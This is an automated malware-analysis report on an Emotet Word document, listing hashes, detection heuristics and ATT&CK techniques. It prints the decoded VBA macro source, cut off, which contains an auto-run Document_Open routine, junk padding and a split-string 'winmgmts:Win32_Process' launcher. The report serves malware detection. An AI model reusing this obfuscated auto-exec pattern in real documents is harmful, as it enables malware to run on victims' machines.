Emotet Office (OLE) malware analysis — malicious · 8d56a8ad6afa592e

MALICIOUS

Office (OLE)

176.0 KB Created: 2019-12-09 20:11:00 Authoring application: Microsoft Office Word First seen: 2020-01-07

MD5: 68fb79964f8c30cb9f75738bb6ab96df SHA-1: ecb9e28f02cd7f5a7d026fcd14e312b9c7534303 SHA-256: 8d56a8ad6afa592ed46d6a295b2246ed8b80ee67007799c62b7280a0e953f2c3

322 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, specifically a Document_Open macro, which is designed to execute automatically. The macro uses `GetObject` and `CreateObject` with the `winmgmts` moniker to interact with WMI, specifically launching a process. This behavior is characteristic of Emotet, a known downloader family, and is further supported by ClamAV's detection signature.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7441587-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7441587-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6006 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6006 bytes
SHA-256: `9815b8e725c00315fc777aeedb4e2fb570d5ddbb435714e22875b5355aea0f30`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Imcedpfk" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Pjlsqgaoogb, 0, 0, MSForms, TextBox" Private Sub Document_open() Dim Hxuxhuajsnaz, Cormwrtv If Jfjnybjlxgw > Igyahwrlgculz Then Dfbleenclml = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Ocfhmpjg < Lzafdcobyit Then Ekkuuemnwfnw = 22 End If If Mzkjkeopmezkz < Mikfkaxbuo Then Dpunizfcco = 355 End If Dim Dlhezgbrpvtgt, Yiskjcwywcg If Khvligvyoon > Xvpwwyjxacbjx Then Nkcssmgha = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Mkpktfekfajzf < Rkftbkjo Then Luomqnoo = 22 End If If Zhpivfmrge < Knvwcgfndvfgh Then Yomukgwejux = 355 End If Dim Htxxuaheq, Ceubcvtdwccun If Pldqobfeityue > Bcycwsdnbz Then Edfzjvvkw = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Uuwzmidapimbz < Fgmycratbb Then Pzilnaddhztr = 22 End If If Yyzrbgdyppxxy < Auxiooahxzbw Then Fmvtfscu = 355 End If Xbivpbnb End Sub Attribute VB_Name = "Tmdysygpwknyk" Attribute VB_Base = "0{1CC9AA49-E8A3-43B7-90FC-260F78C2B9E0}{C24C83C8-2D63-4BDE-967A-ED8D002A6C43}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Yemtlfcccma" Function Oujdmcxlvud() Dim Imoaxwgorxyva, Yxrxpwgsrmjmi If Zezzrdwkki > Daxvlqdtlj Then Actxonjxohy = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Byucmgodkcru < Vfgyqtlypkzwx Then Xwcdzksjrzc = 22 End If If Pabdwpnshj < Kcjkdpip Then Gpqrndvpyn = 355 End If Cstfarqobcvbm = Imcedpfk.Pjlsqgaoogb Dim Memzgxvt, Zpyowpebuuao If Tglrkkzf > Nbdqpjyzyfflr Then Hmywabyzl = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Ldjtwuib < Mollwapyuhob Then Xaigvocr = 22 End If If Yuqfjldqilv < Ldbiarxmjsg Then Lbfmsudvmcjk = 355 End If Xpkdzwjgd = Cstfarqobcvbm + Tmdysygpwknyk.Jkjjvyoelqiem + Tmdysygpwknyk.Fxpmnijvroq + Tmdysygpwknyk.Xdzhmicr Dim Qagdyacswlzqb, Rrmqwixcbx If Pnmuxzof > Axxzjldt Then Bbtwuugptxe = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Ynfjqbrnpbrq < Xzlyiuqzntqa Then Yljvuczmecnr = 22 End If If Mzcffbjq < Wleyzmtqyyodr Then Mtlujlqiqnork = 355 End If Iseaooqnqdgf = Xpkdzwjgd + Tmdysygpwknyk.Nqfbrwspkr + Tmdysygpwknyk.Vodsbvox Dim Doauyajghgejh, Ewwkffee If Albxbxfde > Kqfwjzcix Then Lrthlqcrzjep = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Hjgizgdrytf < Wfbvyqhzkeu Then Amavgbgibqw = 22 End If If Hptszctdglxog < Owelwkfqqdn Then Fupevzisgs = 355 End If Oujdmcxlvud = Jigfqktfkgmol + Iseaooqnqdgf + Jigfqktfkgmol Dim Lwtyzujfgb, Tkbicgtn If Ordtvnjm > Wybmmmpyelea Then Ffrbnmfkgji = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Gzvvtrpdviow < Ujuxnnnnqwiy Then Mrseksizip = 22 End If If Omkwceyvla < Uohtiznutc Then Qklxjuae = 355 End If End Function Function Xbivpbnb() Dim Jogurdprnigdz, Tzeyvbru If Ghiwanias > Quigjywdqdu Then Edzuzwst = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Lwgvmuychwk < Vsmdurmbl Then Rwonbwlxm = 22 End If If Kddjisbnksbzd < Txbrozwbdqg Then Lkmqayij = 355 End If Wzdxaknjmslmj = j + "win" + "mgmt" + "s:Win32_Process" Dim Svlkodrgktohe, Oxjdosppzdndm If Jbrlrernmto > Hsbhvfzr Then Ledflgaa = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Vkmqshsxkw < Loigcfhhuwdaf Then Yfgmtjufwgl = 22 End If If Nbhjsmtpxee < Xsygmklttrdj Then Qjlarqstspu = 355 End If Set Uahcnyrhbzes = CreateObject(Wzdxaknjmslmj) Dim Wqcesyszvncdu, Owmfrsih If Ohmrdvoyzsxyd > Kpmsxyzsezwdy Then Njfgerghr = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Eusgqscghdw < Zopishrqzufns Then Hehuajtez = 22 End If If Darraquf ... (truncated)

SHA-256: 9815b8e725c00315fc777aeedb4e2fb570d5ddbb435714e22875b5355aea0f30

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Imcedpfk"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Pjlsqgaoogb, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dim Hxuxhuajsnaz, Cormwrtv
If Jfjnybjlxgw > Igyahwrlgculz Then
         Dfbleenclml = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Ocfhmpjg < Lzafdcobyit Then
         Ekkuuemnwfnw = 22
End If
If Mzkjkeopmezkz < Mikfkaxbuo Then
         Dpunizfcco = 355
End If
   Dim Dlhezgbrpvtgt, Yiskjcwywcg
If Khvligvyoon > Xvpwwyjxacbjx Then
         Nkcssmgha = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Mkpktfekfajzf < Rkftbkjo Then
         Luomqnoo = 22
End If
If Zhpivfmrge < Knvwcgfndvfgh Then
         Yomukgwejux = 355
End If
   Dim Htxxuaheq, Ceubcvtdwccun
If Pldqobfeityue > Bcycwsdnbz Then
         Edfzjvvkw = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Uuwzmidapimbz < Fgmycratbb Then
         Pzilnaddhztr = 22
End If
If Yyzrbgdyppxxy < Auxiooahxzbw Then
         Fmvtfscu = 355
End If
Xbivpbnb
End Sub

Attribute VB_Name = "Tmdysygpwknyk"
Attribute VB_Base = "0{1CC9AA49-E8A3-43B7-90FC-260F78C2B9E0}{C24C83C8-2D63-4BDE-967A-ED8D002A6C43}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Yemtlfcccma"
Function Oujdmcxlvud()
   Dim Imoaxwgorxyva, Yxrxpwgsrmjmi
If Zezzrdwkki > Daxvlqdtlj Then
         Actxonjxohy = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Byucmgodkcru < Vfgyqtlypkzwx Then
         Xwcdzksjrzc = 22
End If
If Pabdwpnshj < Kcjkdpip Then
         Gpqrndvpyn = 355
End If
Cstfarqobcvbm = Imcedpfk.Pjlsqgaoogb
   Dim Memzgxvt, Zpyowpebuuao
If Tglrkkzf > Nbdqpjyzyfflr Then
         Hmywabyzl = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Ldjtwuib < Mollwapyuhob Then
         Xaigvocr = 22
End If
If Yuqfjldqilv < Ldbiarxmjsg Then
         Lbfmsudvmcjk = 355
End If
Xpkdzwjgd = Cstfarqobcvbm + Tmdysygpwknyk.Jkjjvyoelqiem + Tmdysygpwknyk.Fxpmnijvroq + Tmdysygpwknyk.Xdzhmicr
   Dim Qagdyacswlzqb, Rrmqwixcbx
If Pnmuxzof > Axxzjldt Then
         Bbtwuugptxe = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Ynfjqbrnpbrq < Xzlyiuqzntqa Then
         Yljvuczmecnr = 22
End If
If Mzcffbjq < Wleyzmtqyyodr Then
         Mtlujlqiqnork = 355
End If
Iseaooqnqdgf = Xpkdzwjgd + Tmdysygpwknyk.Nqfbrwspkr + Tmdysygpwknyk.Vodsbvox
   Dim Doauyajghgejh, Ewwkffee
If Albxbxfde > Kqfwjzcix Then
         Lrthlqcrzjep = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Hjgizgdrytf < Wfbvyqhzkeu Then
         Amavgbgibqw = 22
End If
If Hptszctdglxog < Owelwkfqqdn Then
         Fupevzisgs = 355
End If
Oujdmcxlvud = Jigfqktfkgmol + Iseaooqnqdgf + Jigfqktfkgmol
   Dim Lwtyzujfgb, Tkbicgtn
If Ordtvnjm > Wybmmmpyelea Then
         Ffrbnmfkgji = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Gzvvtrpdviow < Ujuxnnnnqwiy Then
         Mrseksizip = 22
End If
If Omkwceyvla < Uohtiznutc Then
         Qklxjuae = 355
End If
End Function
Function Xbivpbnb()
   Dim Jogurdprnigdz, Tzeyvbru
If Ghiwanias > Quigjywdqdu Then
         Edzuzwst = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Lwgvmuychwk < Vsmdurmbl Then
         Rwonbwlxm = 22
End If
If Kddjisbnksbzd < Txbrozwbdqg Then
         Lkmqayij = 355
End If
Wzdxaknjmslmj = j + "win" + "mgmt" + "s:Win32_Process"
   Dim Svlkodrgktohe, Oxjdosppzdndm
If Jbrlrernmto > Hsbhvfzr Then
         Ledflgaa = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Vkmqshsxkw < Loigcfhhuwdaf Then
         Yfgmtjufwgl = 22
End If
If Nbhjsmtpxee < Xsygmklttrdj Then
         Qjlarqstspu = 355
End If
Set Uahcnyrhbzes = CreateObject(Wzdxaknjmslmj)
   Dim Wqcesyszvncdu, Owmfrsih
If Ohmrdvoyzsxyd > Kpmsxyzsezwdy Then
         Njfgerghr = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Eusgqscghdw < Zopishrqzufns Then
         Hehuajtez = 22
End If
If Darraquf
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.